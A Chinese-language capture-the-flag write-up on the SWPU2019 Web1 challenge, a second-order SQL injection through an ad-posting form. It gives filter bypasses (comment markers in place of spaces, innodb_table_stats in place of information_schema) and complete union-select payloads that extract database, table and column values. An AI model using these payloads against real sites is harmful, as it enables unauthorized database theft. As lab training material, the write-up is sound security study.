[SWPU2019]Web1
这道题是个二次注入,做之前感觉挺难得,做完发现也就那么点东西。
没错,还是参考了王叹之大佬的博客,神!
来发广告
首先以为是弱口令登录admin,试了一波BP爆破,无果。
然后是SQLmap,无果。
然后······是我瞎了我没看到注册······
注册登录以后是一个打广告的界面:
好像唯一的入口就是这个申请发布广告,看看咋回事。
发现注入点
点击广告详情来到了这个网页:
?id=38盲猜是注入?猜测这里提取内容的语句是
select * from xxx where name=广告名
那么,好像存在注入点,毕竟我们输入的内容可控。
试试看构造
1' order by 1#
一番测试以后,发现过滤了or,#,--+和空格
ByPass
-
空格被过滤
空格过滤可以利用/**/代替空格 -
注释符被过滤
将后面的单引号闭合即可 -
or被过滤
这就很难受了,order by、information_schema都不能用。
于是查表名使用select group_concat(table_name) from mysql.innodb_table_stats where database_name=database()
跳过爆字段名直接爆值,参考这个
Payload
- 首先爆数据库,试了一下有22个字段:
1'/**/union/**/select/**/1,database(),3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22'
懂了,库名是web1
- 然后是爆表名:
1'/**/union/**/select/**/1,database(),group_concat(table_name),4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22/**/from/**/mysql.innodb_table_stats/**/where/**/database_name="web1"'
懂了,表名是users
- 无字段名爆值
1'/**/union/**/select/**/1,database(),(select/**/group_concat(b)/**/from/**/(select/**/1,2/**/as/**/a,3/**/as/**/b/**/union/**/select/**/*/**/from/**/users)a),4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22'
学到了学到了,特以此博文纪念~